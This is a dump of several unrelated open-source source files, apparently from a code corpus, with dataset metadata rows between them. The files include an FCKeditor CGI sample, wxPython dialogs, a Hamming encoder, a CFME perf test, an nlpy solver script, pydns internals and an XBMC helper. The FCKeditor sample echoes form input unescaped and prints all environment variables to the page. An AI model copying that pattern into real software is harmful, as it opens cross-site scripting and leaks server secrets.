# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce import set_module_version
set_module_version("3.1.0",115)
| mit | -5,861,002,526,525,387,000 | 50.217391 | 80 | 0.775042 | false |
farra/apachecon-consite | public/javascripts/fckeditor/_samples/py/sampleposteddata.py | 1 | 2067 | #!/usr/bin/env python
"""
FCKeditor - The text editor for Internet - http://www.fckeditor.net
Copyright (C) 2003-2007 Frederico Caldeira Knabben
== BEGIN LICENSE ==
Licensed under the terms of any of the following licenses at your
choice:
- GNU General Public License Version 2 or later (the "GPL")
http://www.gnu.org/licenses/gpl.html
- GNU Lesser General Public License Version 2.1 or later (the "LGPL")
http://www.gnu.org/licenses/lgpl.html
- Mozilla Public License Version 1.1 or later (the "MPL")
http://www.mozilla.org/MPL/MPL-1.1.html
== END LICENSE ==
This page lists the data posted by a form.
"""
import cgi
import os
# Tell the browser to render html
print "Content-Type: text/html"
print ""
try:
# Create a cgi object
form = cgi.FieldStorage()
except Exception, e:
print e
# Document header
print """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>FCKeditor - Samples - Posted Data</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex, nofollow">
<link href="../sample.css" rel="stylesheet" type="text/css" />
</head>
<body>
"""
# This is the real work
print """
<h1>FCKeditor - Samples - Posted Data</h1>
This page lists all data posted by the form.
<hr>
<table width="100%" border="1" cellspacing="0" bordercolor="#999999">
<tr style="FONT-WEIGHT: bold; COLOR: #dddddd; BACKGROUND-COLOR: #999999">
<td nowrap>Field Name </td>
<td>Value</td>
</tr>
"""
for key in form.keys():
try:
value = form[key].value
print """
<tr>
<td valign="top" nowrap><b>%s</b></td>
<td width="100%%" style="white-space:pre">%s</td>
</tr>
""" % (key, value)
except Exception, e:
print e
print "</table>"
# For testing your environments
print "<hr>"
for key in os.environ.keys():
print "%s: %s<br>" % (key, os.environ.get(key, ""))
print "<hr>"
# Document footer
print """
</body>
</html>
"""
| mit | -7,844,805,213,854,063,000 | 22.317647 | 76 | 0.630382 | false |
Akson/RemoteConsolePlus3 | RemoteConsolePlus3/RCP3/Backends/Sources/ZMQ/Tools/UI.py | 1 | 5885 | #Created by Dmytro Konobrytskyi, 2013 (github.com/Akson)
import wx
from RCP3.Backends.Sources.ZMQ.Tools.RoutersListProvider import GetAvailableRoutersList
class ServerSelectionDialog(wx.Dialog):
def __init__(self, currentServerAddress = None):
super(ServerSelectionDialog, self).__init__(parent=None, size=(270, 260))
self._originalServerAddress = currentServerAddress
self.serverAddress = currentServerAddress
self.availableServersList = GetAvailableRoutersList()
self.currentlySelectedIdx = -1
self.InitUI()
self.SetTitle("Select router address")
def InitUI(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox = wx.BoxSizer(wx.HORIZONTAL)
hbox.Add(wx.StaticText(self, label='Router address:'), flag=wx.ALIGN_CENTER_VERTICAL)
self.addressTextCtrl = wx.TextCtrl(self)
self.addressTextCtrl.SetValue(self.serverAddress if self.serverAddress else "")
hbox.Add(self.addressTextCtrl, proportion=1, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.listBox = wx.ListBox(self, wx.NewId(), wx.DefaultPosition, (-1, 150), self.availableServersList, wx.LB_SINGLE)
hbox.Add(self.listBox, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(self, label='Ok')
closeButton = wx.Button(self, label='Close')
refreshButton = wx.Button(self, label='Refresh list')
hbox.Add(okButton)
hbox.Add(closeButton, flag=wx.LEFT, border=5)
hbox.Add(refreshButton, flag=wx.LEFT, border=10)
vbox.Add(hbox, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=5)
self.SetSizer(vbox)
okButton.Bind(wx.EVT_BUTTON, self.SaveNewAddresAndClose)
closeButton.Bind(wx.EVT_BUTTON, self.RestoreOriginalAndClose)
refreshButton.Bind(wx.EVT_BUTTON, self.RefreshRoutersList)
self.Bind(wx.EVT_CLOSE, self.RestoreOriginalAndClose)
self.listBox.Bind(wx.EVT_LISTBOX, self.OnSelect)
self.addressTextCtrl.Bind(wx.EVT_TEXT, self.OnText)
def OnText(self, event):
if self.availableServersList[self.currentlySelectedIdx] != self.addressTextCtrl.GetValue():
self.currentlySelectedIdx = -1
self.listBox.Select(self.currentlySelectedIdx)
def OnSelect(self, event):
self.currentlySelectedIdx = event.GetSelection()
self.addressTextCtrl.SetValue(self.availableServersList[event.GetSelection()])
self.listBox.Select(self.currentlySelectedIdx)
def RefreshRoutersList(self, e=None):
self.availableServersList = GetAvailableRoutersList()
self.listBox.Set(self.availableServersList)
self.listBox.Select(self.currentlySelectedIdx)
def SaveNewAddresAndClose(self, e):
self.serverAddress = self.addressTextCtrl.GetValue()
self.Destroy()
def RestoreOriginalAndClose(self, e):
self.serverAddress = self._originalServerAddress
self.Destroy()
class StreamsSelectionDialog(wx.Dialog):
def __init__(self, currentServerAddress, currentStreams = []):
super(StreamsSelectionDialog, self).__init__(parent=None, size=(670, 360))
self.serverAddress = currentServerAddress
self._originalStreams = currentStreams
self.streamsList = currentStreams
self.currentlySelectedIdx = -1
self.InitUI()
self.SetTitle("Select listening streams for "+self.serverAddress)
def InitUI(self):
vbox = wx.BoxSizer(wx.VERTICAL)
hbox = wx.BoxSizer(wx.HORIZONTAL)
hbox.Add(wx.StaticText(self, label='Stream name:'), flag=wx.ALIGN_CENTER_VERTICAL)
self.addressTextCtrl = wx.TextCtrl(self)
self.addressTextCtrl.SetValue("")
hbox.Add(self.addressTextCtrl, proportion=1, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
addButton = wx.Button(self, label='Add')
hbox.Add(addButton, flag=wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.EXPAND, border=5)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.listBox = wx.ListBox(self, wx.NewId(), wx.DefaultPosition, (-1, 250), self.streamsList, wx.LB_SINGLE)
hbox.Add(self.listBox, proportion=1, flag=wx.EXPAND)
vbox.Add(hbox, flag=wx.ALL|wx.EXPAND, border=5)
hbox = wx.BoxSizer(wx.HORIZONTAL)
okButton = wx.Button(self, label='Ok')
closeButton = wx.Button(self, label='Close')
hbox.Add(okButton)
hbox.Add(closeButton, flag=wx.LEFT, border=5)
vbox.Add(hbox, flag=wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM, border=5)
self.SetSizer(vbox)
okButton.Bind(wx.EVT_BUTTON, self.SaveAndClose)
closeButton.Bind(wx.EVT_BUTTON, self.RestoreOriginalAndClose)
addButton.Bind(wx.EVT_BUTTON, self.OnAddButton)
self.Bind(wx.EVT_CLOSE, self.RestoreOriginalAndClose)
self.listBox.Bind(wx.EVT_KEY_DOWN, self.OnKeyPress)
self.listBox.Bind(wx.EVT_LISTBOX, self.OnSelect)
def OnSelect(self, event):
self.currentlySelectedIdx = event.GetSelection()
def OnAddButton(self, e):
self.listBox.Append(self.addressTextCtrl.GetValue())
pass
def SaveAndClose(self, e):
self.streamsList = self.listBox.GetStrings()
self.Destroy()
def RestoreOriginalAndClose(self, e):
self.streamsList = self._originalStreams
self.Destroy()
def OnKeyPress(self, evt):
if evt.GetKeyCode() == wx.WXK_DELETE:
if self.currentlySelectedIdx!=-1:
self.listBox.Delete(self.currentlySelectedIdx) | lgpl-3.0 | -610,739,986,345,620,500 | 42.6 | 123 | 0.668479 | false |
imrandomizer/Algorithm-Implementations | Hamming_Code/Python/AlexMathew/HammingCode.py | 27 | 1830 | """
AUTHOR : Alex Mathew
EMAIL : [email protected]
There is a lot I can do to improve this implementation.
"""
"""For a given binary word, print out its corresponding Hamming Coded word"""
import math
def FindKeyBits(n):
keyBits=[]
pad = int(math.ceil(math.log(n)/math.log(2)))
for i in xrange(1, n+1):
b = "{0:b}".format(i)
b=b.zfill(pad)
keyBits.append(b)
return keyBits
def IsPowerOf2(x):
return ((x&(x-1))==0)
def XOR(a, b):
return str(int(a)^int(b))
def FindParityCount(m):
r = math.ceil((math.log(m)/math.log(2))+1)
return int(r)
def CalculateParity(keyBits, data, parityTrack):
parity = '0'
pbCount = 0
for elem in keyBits:
if not IsPowerOf2(int(elem,2)):
if elem[-parityTrack]=='1':
parity = XOR(parity, data[pbCount-int(elem,2)])
else:
pbCount+=1
return parity
def ComputeHamming(data):
dataLen = len(data)
parityCount = FindParityCount(dataLen)
hammingLen = dataLen + parityCount
keyBits = FindKeyBits(hammingLen)
hammingCode = []
dataTrack = -1
parityTrack = 1
for i in xrange(1, hammingLen+1):
if IsPowerOf2(i):
parity = CalculateParity(keyBits, data, parityTrack)
hammingCode.append(parity)
parityTrack+=1
else:
hammingCode.append(data[dataTrack])
dataTrack-=1
hammingCode.reverse()
for i in hammingCode:
print i,
def main():
print 'The inputs are passed into the HammingCode() function as a string \n'
print '\nSample runs - '
print '\n\nINPUT : 1101'
print 'OUTPUT : '
ComputeHamming('1101')
print '\n\nINPUT : 11011101'
print 'OUTPUT : '
ComputeHamming('11011101')
print '\n\n'
data = raw_input("Enter the word to be encoded : ")
print '\nThe Hamming encoded word for', data, 'is : ',
ComputeHamming(data)
if __name__ == '__main__':
main() | mit | 3,182,387,992,965,928,400 | 22.177215 | 78 | 0.650273 | false |
nachandr/cfme_tests | cfme/tests/perf/workloads/test_idle.py | 2 | 2619 | """Runs Idle Workload by resetting appliance and enabling specific roles with no providers."""
import time
import pytest
from cfme.utils.conf import cfme_performance
from cfme.utils.grafana import get_scenario_dashboard_urls
from cfme.utils.log import logger
from cfme.utils.smem_memory_monitor import add_workload_quantifiers
from cfme.utils.smem_memory_monitor import SmemMemoryMonitor
from cfme.utils.workloads import get_idle_scenarios
def pytest_generate_tests(metafunc):
argvalues = [[scenario] for scenario in get_idle_scenarios()]
idlist = [scenario['name'] for scenario in get_idle_scenarios()]
metafunc.parametrize(['scenario'], argvalues, ids=idlist)
@pytest.mark.usefixtures('generate_version_files')
def test_idle(appliance, request, scenario):
"""Runs an appliance at idle with specific roles turned on for specific amount of time. Memory
Monitor creates graphs and summary at the end of the scenario.
Polarion:
assignee: rhcf3_machine
casecomponent: CandU
initialEstimate: 1/4h
"""
from_ts = int(time.time() * 1000)
logger.debug('Scenario: {}'.format(scenario['name']))
appliance.clean_appliance()
quantifiers = {}
scenario_data = {'appliance_ip': appliance.hostname,
'appliance_name': cfme_performance['appliance']['appliance_name'],
'test_dir': 'workload-idle',
'test_name': 'Idle with {} Roles'.format(scenario['name']),
'appliance_roles': ', '.join(scenario['roles']),
'scenario': scenario}
monitor_thread = SmemMemoryMonitor(appliance.ssh_client(), scenario_data)
def cleanup_workload(from_ts, quantifiers, scenario_data):
starttime = time.time()
to_ts = int(starttime * 1000)
g_urls = get_scenario_dashboard_urls(scenario, from_ts, to_ts)
logger.debug('Started cleaning up monitoring thread.')
monitor_thread.grafana_urls = g_urls
monitor_thread.signal = False
monitor_thread.join()
add_workload_quantifiers(quantifiers, scenario_data)
timediff = time.time() - starttime
logger.info(f'Finished cleaning up monitoring thread in {timediff}')
request.addfinalizer(lambda: cleanup_workload(from_ts, quantifiers, scenario_data))
monitor_thread.start()
appliance.wait_for_miq_server_workers_started(poll_interval=2)
appliance.update_server_roles({role: True for role in scenario['roles']})
s_time = scenario['total_time']
logger.info(f'Idling appliance for {s_time}s')
time.sleep(s_time)
quantifiers['Elapsed_Time'] = s_time
logger.info('Test Ending...')
| gpl-2.0 | 702,448,374,173,108,000 | 38.681818 | 98 | 0.699504 | false |
optimizers/nlpy | nlpy/optimize/solvers/nlpy_funnel.py | 3 | 5078 | #!/usr/bin/env python
from nlpy import __version__
from nlpy.model import AmplModel
from nlpy.optimize.solvers.funnel import Funnel, LSTRFunnel, LDFPFunnel, \
StructuredLDFPFunnel
from nlpy.tools.timing import cputime
from optparse import OptionParser
import numpy
import nlpy.tools.logs
import sys, logging, os
# Create root logger.
log = logging.getLogger('funnel')
log.setLevel(logging.INFO)
fmt = logging.Formatter('%(name)-15s %(levelname)-8s %(message)s')
hndlr = logging.StreamHandler(sys.stdout)
hndlr.setFormatter(fmt)
log.addHandler(hndlr)
# Configure the solver logger.
sublogger = logging.getLogger('funnel.solver')
sublogger.setLevel(logging.INFO)
sublogger.addHandler(hndlr)
sublogger.propagate = False
def pass_to_funnel(nlp, **kwargs):
verbose = (kwargs['print_level'] == 2)
qn = kwargs.pop('quasi_newton')
t = cputime()
if qn:
funn = StructuredLDFPFunnel(nlp, logger_name='funnel.solver', **kwargs)
# funn = LDFPFunnel(nlp, logger_name='funnel.solver', **kwargs)
else:
funn = Funnel(nlp, logger_name='funnel.solver', **kwargs)
t_setup = cputime() - t # Setup time.
funn.solve() #reg=1.0e-8)
return (t_setup, funn)
usage_msg = """%prog [options] problem1 [... problemN]
where problem1 through problemN represent unconstrained nonlinear programs."""
# Define allowed command-line options
parser = OptionParser(usage=usage_msg, version='%prog version ' + __version__)
parser.add_option("-p", "--stop_p", action="store", type="float",
default=1.0e-5, dest="stop_p",
help="Primal stopping tolerance")
parser.add_option("-d", "--stop_d", action="store", type="float",
default=1.0e-5, dest="stop_d",
help="Dual stopping tolerance")
parser.add_option("-q", "--quasi_newton", action="store_true",
default=False, dest="quasi_newton",
help="Use LDFP approximation of Hessian")
parser.add_option("-i", "--iter", action="store", type="int", default=None,
dest="maxit", help="Specify maximum number of iterations")
parser.add_option("-o", "--print_level", action="store", type="int",
default=0, dest="print_level",
help="Print iterations detail (0, 1 or 2)")
# Parse command-line options
(options, args) = parser.parse_args()
# Translate options to input arguments.
opts = {}
if options.maxit is not None:
opts['maxit'] = options.maxit
opts['stop_p'] = options.stop_p
opts['stop_d'] = options.stop_d
opts['quasi_newton'] = options.quasi_newton
opts['print_level'] = options.print_level
# Set printing standards for arrays
numpy.set_printoptions(precision=3, linewidth=80, threshold=10, edgeitems=3)
multiple_problems = len(args) > 1
error = False
if multiple_problems:
# Define formats for output table.
hdrfmt = '%-10s %5s %5s %15s %7s %7s %6s %6s %5s'
hdr = hdrfmt % ('Name','Iter','Feval','Objective','dResid','pResid',
'Setup','Solve','Opt')
lhdr = len(hdr)
fmt = '%-10s %5d %5d %15.8e %7.1e %7.1e %6.2f %6.2f %5s'
log.info(hdr)
log.info('-' * lhdr)
# Solve each problem in turn.
for ProblemName in args:
nlp = AmplModel(ProblemName)
# Check for equality-constrained problem.
n_ineq = nlp.nlowerC + nlp.nupperC + nlp.nrangeC
if nlp.nbounds > 0 or n_ineq > 0:
msg = '%s has %d bounds and %d inequality constraints\n'
log.error(msg % (nlp.name, nlp.nbounds, n_ineq))
error = True
else:
ProblemName = os.path.basename(ProblemName)
if ProblemName[-3:] == '.nl':
ProblemName = ProblemName[:-3]
t_setup, funn = pass_to_funnel(nlp, **opts)
if multiple_problems:
log.info(fmt % (ProblemName, funn.niter, funn.nlp.feval, funn.f,
funn.dResid, funn.pResid,
t_setup, funn.tsolve, funn.optimal))
nlp.close() # Close model.
if not multiple_problems and not error:
# Output final statistics
log.info('--------------------------------')
log.info('Funnel: End of Execution')
log.info(' Problem : %-s' % ProblemName)
log.info(' Number of variables : %-d' % nlp.n)
log.info(' Number of linear constraints : %-d' % nlp.nlin)
log.info(' Number of general constraints: %-d' % (nlp.m - nlp.nlin))
log.info(' Initial/Final Objective : %-g/%-g' % (funn.f0, funn.f))
log.info(' Number of iterations : %-d' % funn.niter)
log.info(' Number of function evals : %-d' % funn.nlp.feval)
log.info(' Number of gradient evals : %-d' % funn.nlp.geval)
#log.info(' Number of Hessian evals : %-d' % funn.nlp.Heval)
log.info(' Number of Hessian matvecs : %-d' % funn.nlp.Hprod)
log.info(' Setup/Solve time : %-gs/%-gs' % (t_setup, funn.tsolve))
log.info(' Total time : %-gs' % (t_setup + funn.tsolve))
log.info('--------------------------------')
| gpl-3.0 | 617,298,200,298,347,500 | 37.180451 | 83 | 0.606144 | false |
MostlyOpen/odoo_addons | myo_document/models/document_seq.py | 1 | 3257 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openerp import api, fields, models
from datetime import *
def format_code(code_seq):
code = map(int, str(code_seq))
code_len = len(code)
while len(code) < 14:
code.insert(0, 0)
while len(code) < 16:
n = sum([(len(code) + 1 - i) * v for i, v in enumerate(code)]) % 11
if n > 1:
f = 11 - n
else:
f = 0
code.append(f)
code_str = "%s.%s.%s.%s.%s-%s" % (str(code[0]) + str(code[1]),
str(code[2]) + str(code[3]) + str(code[4]),
str(code[5]) + str(code[6]) + str(code[7]),
str(code[8]) + str(code[9]) + str(code[10]),
str(code[11]) + str(code[12]) + str(code[13]),
str(code[14]) + str(code[15]))
if code_len <= 3:
code_form = code_str[18 - code_len:21]
elif code_len > 3 and code_len <= 6:
code_form = code_str[17 - code_len:21]
elif code_len > 6 and code_len <= 9:
code_form = code_str[16 - code_len:21]
elif code_len > 9 and code_len <= 12:
code_form = code_str[15 - code_len:21]
elif code_len > 12 and code_len <= 14:
code_form = code_str[14 - code_len:21]
return code_form
class Document(models.Model):
_inherit = 'myo.document'
code = fields.Char(string='Code', required=False, default=False,
help='Use "/" to get an automatic new Document Code.')
@api.model
def create(self, values):
if 'code' not in values or ('code' in values and values['code'] == '/'):
code_seq = self.pool.get('ir.sequence').next_by_code(self._cr, self._uid, 'myo.document.code')
values['code'] = format_code(code_seq)
return super(Document, self).create(values)
@api.multi
def write(self, values):
if 'code' in values and values['code'] == '/':
code_seq = self.pool.get('ir.sequence').next_by_code(self._cr, self._uid, 'myo.document.code')
values['code'] = format_code(code_seq)
return super(Document, self).write(values)
@api.one
def copy(self, default=None):
default = dict(default or {})
default.update({'code': '/', })
return super(Document, self).copy(default)
| agpl-3.0 | 334,841,388,898,515,650 | 39.209877 | 106 | 0.543138 | false |
sanghinitin/golismero | tools/theHarvester/discovery/DNS/Base.py | 24 | 11574 | """
$Id: Base.py,v 1.12.2.4 2007/05/22 20:28:31 customdesigned Exp $
This file is part of the pydns project.
Homepage: http://pydns.sourceforge.net
This code is covered by the standard Python License.
Base functionality. Request and Response classes, that sort of thing.
"""
import socket, string, types, time
import Type, Class, Opcode
import asyncore
class DNSError(Exception): pass
defaults = { 'protocol':'udp', 'port':53, 'opcode':Opcode.QUERY,
'qtype':Type.A, 'rd':1, 'timing':1, 'timeout': 30 }
defaults['server'] = []
def ParseResolvConf(resolv_path):
global defaults
try:
lines = open(resolv_path).readlines()
except:
print "error in path" + resolv_path
for line in lines:
line = string.strip(line)
if not line or line[0] == ';' or line[0] == '#':
continue
fields = string.split(line)
if len(fields) < 2:
continue
if fields[0] == 'domain' and len(fields) > 1:
defaults['domain'] = fields[1]
if fields[0] == 'search':
pass
if fields[0] == 'options':
pass
if fields[0] == 'sortlist':
pass
if fields[0] == 'nameserver':
defaults['server'].append(fields[1])
def DiscoverNameServers():
import sys
if sys.platform in ('win32', 'nt'):
import win32dns
defaults['server'] = win32dns.RegistryResolve()
else:
return ParseResolvConf()
class DnsRequest:
""" high level Request object """
def __init__(self, *name, **args):
self.donefunc = None
self.async = None
self.defaults = {}
self.argparse(name, args)
self.defaults = self.args
def argparse(self, name, args):
if not name and self.defaults.has_key('name'):
args['name'] = self.defaults['name']
if type(name) is types.StringType:
args['name'] = name
else:
if len(name) == 1:
if name[0]:
args['name'] = name[0]
for i in defaults.keys():
if not args.has_key(i):
if self.defaults.has_key(i):
args[i] = self.defaults[i]
else:
args[i] = defaults[i]
if type(args['server']) == types.StringType:
args['server'] = [args['server']]
self.args = args
def socketInit(self, a, b):
self.s = socket.socket(a, b)
def processUDPReply(self):
import time, select
if self.args['timeout'] > 0:
r, w, e = select.select([self.s], [], [], self.args['timeout'])
if not len(r):
raise DNSError, 'Timeout'
self.reply = self.s.recv(1024)
self.time_finish = time.time()
self.args['server'] = self.ns
return self.processReply()
def processTCPReply(self):
import time, Lib
self.f = self.s.makefile('r')
header = self.f.read(2)
if len(header) < 2:
raise DNSError, 'EOF'
count = Lib.unpack16bit(header)
self.reply = self.f.read(count)
if len(self.reply) != count:
raise DNSError, 'incomplete reply'
self.time_finish = time.time()
self.args['server'] = self.ns
return self.processReply()
def processReply(self):
import Lib
self.args['elapsed'] = (self.time_finish - self.time_start) * 1000
u = Lib.Munpacker(self.reply)
r = Lib.DnsResult(u, self.args)
r.args = self.args
#self.args=None # mark this DnsRequest object as used.
return r
#### TODO TODO TODO ####
# if protocol == 'tcp' and qtype == Type.AXFR:
# while 1:
# header = f.read(2)
# if len(header) < 2:
# print '========== EOF =========='
# break
# count = Lib.unpack16bit(header)
# if not count:
# print '========== ZERO COUNT =========='
# break
# print '========== NEXT =========='
# reply = f.read(count)
# if len(reply) != count:
# print '*** Incomplete reply ***'
# break
# u = Lib.Munpacker(reply)
# Lib.dumpM(u)
def conn(self):
self.s.connect((self.ns, self.port))
def req(self, *name, **args):
" needs a refactoring "
import time, Lib
self.argparse(name, args)
#if not self.args:
# raise DNSError,'reinitialize request before reuse'
protocol = self.args['protocol']
self.port = self.args['port']
opcode = self.args['opcode']
rd = self.args['rd']
server = self.args['server']
if type(self.args['qtype']) == types.StringType:
try:
qtype = getattr(Type, string.upper(self.args['qtype']))
except AttributeError:
raise DNSError, 'unknown query type'
else:
qtype = self.args['qtype']
if not self.args.has_key('name'):
print self.args
raise DNSError, 'nothing to lookup'
qname = self.args['name']
if qtype == Type.AXFR:
print 'Query type AXFR, protocol forced to TCP'
protocol = 'tcp'
#print 'QTYPE %d(%s)' % (qtype, Type.typestr(qtype))
m = Lib.Mpacker()
# jesus. keywords and default args would be good. TODO.
m.addHeader(0,
0, opcode, 0, 0, rd, 0, 0, 0,
1, 0, 0, 0)
m.addQuestion(qname, qtype, Class.IN)
self.request = m.getbuf()
try:
if protocol == 'udp':
self.sendUDPRequest(server)
else:
self.sendTCPRequest(server)
except socket.error, reason:
raise DNSError, reason
if self.async:
return None
else:
return self.response
def sendUDPRequest(self, server):
"refactor me"
self.response = None
self.socketInit(socket.AF_INET, socket.SOCK_DGRAM)
for self.ns in server:
try:
# TODO. Handle timeouts &c correctly (RFC)
#self.s.connect((self.ns, self.port))
self.conn()
self.time_start = time.time()
if not self.async:
self.s.send(self.request)
self.response = self.processUDPReply()
#except socket.error:
except None:
continue
break
if not self.response:
if not self.async:
raise DNSError, 'no working nameservers found'
def sendTCPRequest(self, server):
" do the work of sending a TCP request "
import time, Lib
self.response = None
for self.ns in server:
try:
self.socketInit(socket.AF_INET, socket.SOCK_STREAM)
self.time_start = time.time()
self.conn()
self.s.send(Lib.pack16bit(len(self.request)) + self.request)
self.s.shutdown(1)
self.response = self.processTCPReply()
except socket.error:
continue
break
if not self.response:
raise DNSError, 'no working nameservers found'
#class DnsAsyncRequest(DnsRequest):
class DnsAsyncRequest(DnsRequest, asyncore.dispatcher_with_send):
" an asynchronous request object. out of date, probably broken "
def __init__(self, *name, **args):
DnsRequest.__init__(self, *name, **args)
# XXX todo
if args.has_key('done') and args['done']:
self.donefunc = args['done']
else:
self.donefunc = self.showResult
#self.realinit(name,args) # XXX todo
self.async = 1
def conn(self):
import time
self.connect((self.ns, self.port))
self.time_start = time.time()
if self.args.has_key('start') and self.args['start']:
asyncore.dispatcher.go(self)
def socketInit(self, a, b):
self.create_socket(a, b)
asyncore.dispatcher.__init__(self)
self.s = self
def handle_read(self):
if self.args['protocol'] == 'udp':
self.response = self.processUDPReply()
if self.donefunc:
apply(self.donefunc, (self,))
def handle_connect(self):
self.send(self.request)
def handle_write(self):
pass
def showResult(self, *s):
self.response.show()
#
# $Log: Base.py,v $
# Revision 1.12.2.4 2007/05/22 20:28:31 customdesigned
# Missing import Lib
#
# Revision 1.12.2.3 2007/05/22 20:25:52 customdesigned
# Use socket.inetntoa,inetaton.
#
# Revision 1.12.2.2 2007/05/22 20:21:46 customdesigned
# Trap socket error
#
# Revision 1.12.2.1 2007/05/22 20:19:35 customdesigned
# Skip bogus but non-empty lines in resolv.conf
#
# Revision 1.12 2002/04/23 06:04:27 anthonybaxter
# attempt to refactor the DNSRequest.req method a little. after doing a bit
# of this, I've decided to bite the bullet and just rewrite the puppy. will
# be checkin in some design notes, then unit tests and then writing the sod.
#
# Revision 1.11 2002/03/19 13:05:02 anthonybaxter
# converted to class based exceptions (there goes the python1.4 compatibility :)
#
# removed a quite gross use of 'eval()'.
#
# Revision 1.10 2002/03/19 12:41:33 anthonybaxter
# tabnannied and reindented everything. 4 space indent, no tabs.
# yay.
#
# Revision 1.9 2002/03/19 12:26:13 anthonybaxter
# death to leading tabs.
#
# Revision 1.8 2002/03/19 10:30:33 anthonybaxter
# first round of major bits and pieces. The major stuff here (summarised
# from my local, off-net CVS server :/ this will cause some oddities with
# the
#
# tests/testPackers.py:
# a large slab of unit tests for the packer and unpacker code in DNS.Lib
#
# DNS/Lib.py:
# placeholder for addSRV.
# added 'klass' to addA, make it the same as the other A* records.
# made addTXT check for being passed a string, turn it into a length 1 list.
# explicitly check for adding a string of length > 255 (prohibited).
# a bunch of cleanups from a first pass with pychecker
# new code for pack/unpack. the bitwise stuff uses struct, for a smallish
# (disappointly small, actually) improvement, while addr2bin is much
# much faster now.
#
# DNS/Base.py:
# added DiscoverNameServers. This automatically does the right thing
# on unix/ win32. No idea how MacOS handles this. *sigh*
# Incompatible change: Don't use ParseResolvConf on non-unix, use this
# function, instead!
# a bunch of cleanups from a first pass with pychecker
#
# Revision 1.5 2001/08/09 09:22:28 anthonybaxter
# added what I hope is win32 resolver lookup support. I'll need to try
# and figure out how to get the CVS checkout onto my windows machine to
# make sure it works (wow, doing something other than games on the
# windows machine :)
#
# Code from [email protected]
# win32dns.py from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66260
#
# Really, ParseResolvConf() should be renamed "FindNameServers" or
# some such.
#
# Revision 1.4 2001/08/09 09:08:55 anthonybaxter
# added identifying header to top of each file
#
# Revision 1.3 2001/07/19 07:20:12 anthony
# Handle blank resolv.conf lines.
# Patch from Bastian Kleineidam
#
# Revision 1.2 2001/07/19 06:57:07 anthony
# cvs keywords added
#
#
| gpl-2.0 | -6,877,081,800,795,135,000 | 33.242604 | 80 | 0.574218 | false |
station7/xbmc | addons/service.xbmc.versioncheck/lib/common.py | 82 | 6948 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import xbmc
import xbmcaddon
import xbmcgui
import xbmcvfs
ADDON = xbmcaddon.Addon()
ADDONVERSION = ADDON.getAddonInfo('version')
ADDONNAME = ADDON.getAddonInfo('name')
ADDONPATH = ADDON.getAddonInfo('path').decode('utf-8')
ADDONPROFILE = xbmc.translatePath( ADDON.getAddonInfo('profile') ).decode('utf-8')
ICON = ADDON.getAddonInfo('icon')
monitor = xbmc.Monitor()
# Fixes unicode problems
def string_unicode(text, encoding='utf-8'):
try:
text = unicode( text, encoding )
except:
pass
return text
def normalize_string(text):
try:
text = unicodedata.normalize('NFKD', string_unicode(text)).encode('ascii', 'ignore')
except:
pass
return text
def localise(id):
string = normalize_string(ADDON.getLocalizedString(id))
return string
def log(txt):
if isinstance (txt,str):
txt = txt.decode("utf-8")
message = u'%s: %s' % ("Version Check", txt)
xbmc.log(msg=message.encode("utf-8"), level=xbmc.LOGDEBUG)
def get_password_from_user():
keyboard = xbmc.Keyboard("", ADDONNAME + "," +localise(32022), True)
keyboard.doModal()
if (keyboard.isConfirmed()):
pwd = keyboard.getText()
return pwd
def message_upgrade_success():
xbmc.executebuiltin("XBMC.Notification(%s, %s, %d, %s)" %(ADDONNAME,
localise(32013),
15000,
ICON))
def message_restart():
if dialog_yesno(32014):
xbmc.executebuiltin("RestartApp")
def dialog_yesno(line1 = 0, line2 = 0):
return xbmcgui.Dialog().yesno(ADDONNAME,
localise(line1),
localise(line2))
def upgrade_message(msg, oldversion, upgrade, msg_current, msg_available):
wait_for_end_of_video()
if ADDON.getSetting("lastnotified_version") < ADDONVERSION:
xbmcgui.Dialog().ok(ADDONNAME,
localise(msg),
localise(32001),
